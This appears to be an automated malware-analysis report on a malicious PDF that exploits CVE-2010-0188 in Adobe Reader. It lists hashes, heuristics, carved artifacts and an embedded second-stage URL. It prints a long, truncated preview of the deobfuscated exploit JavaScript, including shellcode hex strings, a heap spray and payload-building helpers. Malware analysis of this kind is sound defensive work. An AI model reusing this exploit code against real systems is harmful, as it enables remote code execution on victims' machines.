Malicious PDF — malware analysis report

Static analysis result for SHA-256 76c0daa1cdf8ac42…

MALICIOUS

PDF

10.6 KB
MD5: cd083e263eaef2d8276c2a194999b340 SHA-1: 39e9c4ce952861f4310aa079338832cbe158bd03 SHA-256: 76c0daa1cdf8ac423644e07b30136090ddca73c0855021238f9754439ff418ba
118 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains an XFA form that leverages the CVE-2010-0188 vulnerability in Adobe Reader. This vulnerability is used to execute a JavaScript payload, which is likely responsible for downloading and executing a second-stage payload from the embedded URL http://testset.com. The ML classifier strongly indicates maliciousness.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 6

  • Adobe Reader LibTIFF XFA image exploit — CVE-2010-0188 critical CVE likely CVE_2010_0188
    PDF contains the CVE-2010-0188 exploit template: XFA JavaScript heap-spray setup, a generated TIFF image payload, and assignment of that TIFF data to an XFA image field rawValue to trigger Adobe Reader's LibTIFF parser.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • AcroForm button with action trigger low PDF_ACROFORM_BUTTON
    PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger — this is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://testset.com In PDF document text
    • http://www.xfa.org/schema/xfa-locale-set/2.1/In PDF document text
    • http://ns.adobe.com/xdp/In PDF document text
    • http://www.xfa.org/schema/xci/1.0/In PDF document text
    • http://www.xfa.org/schema/xfa-data/1.0/In PDF document text

Extracted artifacts 6

Files carved from inside the sample during analysis.

FilenameKindSourceSize
embedded_file_obj0041.bin
c06dcd026a7ea0536b63e07ce688691b585339a3ab7ff59065e546b56308c7bb		 pdf-embedded-file PDF EmbeddedFile object 41 at offset 0xEB5 85 bytes
embedded_file_obj0042.bin
dda0835df994b8be920f715db36452f6cee7bb42bbc9c897f878a7b298ba8e91		 pdf-embedded-file PDF EmbeddedFile object 42 at offset 0xF67 1029 bytes
embedded_file_obj99999.bin
47140fc1ebbcae53444679315cbb2e7481573aaaf5e5d2c5fd7e247513578c31		 pdf-embedded-file PDF EmbeddedFile object 99999 at offset 0x1183 24875 bytes
embedded_file_obj0044.bin
3dd68f00f4fcb366a2a3a17c65cb2626eeddf5ea5713302d374310561d810169		 pdf-embedded-file PDF EmbeddedFile object 44 at offset 0x251E 144 bytes
embedded_file_obj0045.bin
10c03f88a5f0a0833dc5b2c8ac295b3a3c6f65e23889eb8cc1dc6fe29bf7f275		 pdf-embedded-file PDF EmbeddedFile object 45 at offset 0x25CB 77 bytes
xfa_base26_stage_000.js
8e07f54db6c870b573a12ed711a994b14e341439754593722faa88eb8b8ed44d		 deobfuscated-js XFA separator-stripped base-26 decoded JavaScript (decompressed, XML-entity decoded) at offset 0x136C 4296 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s). Carved artifact contains 5 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var padding;var bbb, ccc, ddd, eee, fff, ggg, hhh;var pointers_a, i;var x = new Array();var y = new Array();var _l1="4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141"+"000017b66717075637d36737c64756a76237869646e6d3a63637969666629613d31747b6627613a3a613a37613a3c613a3d613a3f613a3f613a36723a3e613a3e613d3569687f6626613a36723a30333a32333a36723d38776a75667970766f3078607e247361647e6f636f5364766f23746e65637f28626e6f2d6f636e213131313569667f6d6d2271647166716f2f2a30747478607f2a16397646cb1b5a8ac33db10f698e0a8ef89cee0e4e8ffffefc98e8065ffefa600a64c5700f30874af5700f3087431be20bec03c384065ff35c0be3800a64065ff3500a661570c584165ff00a6753500a600a6151440d1448803401ca8950090d1446cc6c646e250d1447c4726077700d1447c159c338eb8c065ff0000008f86350237d2028042447c233327674042447c3776562742407cc042c5d800001040ce1827be20beffffff168e8eb8804c3861ff45d6c62757860000e6f6863eff503c3801e5b8ceb85505910c3805000000ff8604a60585000000008e9f2effffff898e9550a67fb88086b83fbe69304733c0d7080286b8da35be3c95e5ba5c30b840b8dd308db8c04245ffce64d8b4c0b866dd3042e5b8e56e57f1b31fbe04ad30d0bc1c80472f8301ebf0bd335c30dacf14949c335f300267b8655f30875347b8c357b86515c4be9e15574e58424378bf576093643c0304b88bffff0151ee18c2334730c3e5b866bd338067b865c107b8c004b80304b8460c33f59e43574e58cfcf4e3866".split('').reverse().join('').replace(/;/g,'');var _l2="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141"+"000017b66717075637d36737c64756a76237869646e6d3a63637969666629613d31747b6627613a3a613a37613a3c613a3d613a3f613a3f613a36723a3e613a3e613d3569687f6626613a36723a30333a32333a36723d38776a75667970766f3078607e247361647e6f636f5364766f23746e65637f28626e6f2d6f636e213131313569667f6d6d2271647166716f2f2a30747478607f2a16397646cb1b5a8ac33db10f698e0a8ef89cee0e4e8ffffefc98e8065ffefa600a64c5700f30874af5700f3087431be20bec03c384065ff35c0be3800a64065ff3500a661570c584165ff00a6753500a600a6151440d1448803401ca8950090d1446cc6c646e250d1447c4726077700d1447c159c338eb8c065ff0000008f86350237d2028042447c233327674042447c3776562742407cc042c5d800001040ce1827be20beffffff168e8eb8804c3861ff45d6c62757860000e6f6863eff503c3801e5b8ceb85505910c3805000000ff8604a60585000000008e9f2effffff898e9550a67fb88086b83fbe69304733c0d7080286b8da35be3c95e5ba5c30b840b8dd308db8c04245ffce64d8b4c0b866dd3042e5b8e56e57f1b31fbe04ad30d0bc1c80472f8301ebf0bd335c30dacf14949c335f300267b8655f30875347b8c357b86515c4be9e15574e58424378bf576093643c0304b88bffff0151ee18c2334730c3e5b866bd338067b865c107b8c004b80304b8460c33f59e43574e58cfcf4e3866".split('').reverse().join('').replace(/;/g,'');_l3=app;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.replace('.','');while(_l6.length<4)_l6+='0';return parseInt(_l6,10)}function _l7(_l8,_l9){while(_l8.length*2<_l9)_l8+=_l8;return _l8.substring(0,_l9/2)}function _I0(_I1){_I1=unescape(_I1);roteDak=_I1.length*2;dakRote=unescape('%u9090');spray=_l7(dakRote,0x2000-roteDak);loxWhee=_I1+spray;loxWhee=_l7(loxWhee,524098);for(i=0; i < 400; i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote;}function _I2(_I1,len){while(_I1.length<len)_I1+=_I1;return _I1.substring(0,len)}function _I3(_I1){ret='';for(i=0;i<_I1.length;i+=2){b=_I1.substr(i,2);c=parseInt(b,16);ret+=String.fromCharCode(c);}return ret}function _ji1(_I1,_I4){_I5='';for(_I6=0;_I6<_I1.length;_I6++){_l9=_I4.length;_I7=_I1.charCodeAt(_I6);_I8=_I4.charCodeAt(_I6%_l9);_I5+=String.fromCharCode(_I7^_I8);}return _I5}function _I9(_I6){_j0=_I6.toString(16);_j1=_j0.length;_I5=(_j1%2)?'0'+_j0:_j0;return _I5}function _j2(_I1){_I5='';for(_I6=0;_I6<_I1.length;_I6+=2){_I5+='%u';_I5+=_I9(_I1.charCodeAt(_I6+1));_I5+=_I9(_I1.charCodeAt(_I6))}return _I5}function _j3(){_j4=_l5();if(_j4<9000){_j5='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';_j6=_l1;_j7=_I3(_j6)}else{_j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';_j6=_l2;_j7=_I3(_j6)}_j8='SUkqADggAABB';_j9=_I2('QUFB',10984);_ll0='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.